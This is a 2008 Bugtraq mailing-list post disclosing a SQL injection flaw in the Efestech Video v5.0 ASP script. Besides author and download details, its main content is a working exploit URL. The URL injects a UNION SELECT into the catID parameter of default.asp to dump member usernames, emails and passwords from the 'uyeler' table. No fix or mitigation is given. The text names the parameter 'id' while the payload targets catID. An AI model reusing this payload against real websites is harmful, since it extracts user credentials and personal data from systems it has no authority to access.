[prev in list] [next in list] [prev in thread] [next in thread] 

List:       bugtraq
Subject:    Efestech Video v5,0 (id) Remote Sql Injection
From:       dj_remix_20 () hotmail ! com
Date:       2008-03-29 20:13:03
Message-ID: 20080329201303.23608.qmail () securityfocus ! com
[Download RAW message or body]

#####################################################################
$Author : RMx
$Mail : RM-x@Msn.com
$Homepage : Coderx.org
$Script name :Efestech video v5.0
$Script download :http://www.aspindir.com/goster/4835
$Script Sales : Free
$Thanks : Ex-47 , TR_IP
####################################################################
$Vulnerable file :

Default.asp

$Vulnerable code :

id parameters cannot filter...

$Exploit :

http://www.hedefsite.com/[path]/default.asp?catID=-1%20union%20select%200,kullanici,eposta,3,4,5,sifre,7,8,9,10,11,12,13%20from%20uyeler



[prev in list] [next in list] [prev in thread] [next in thread]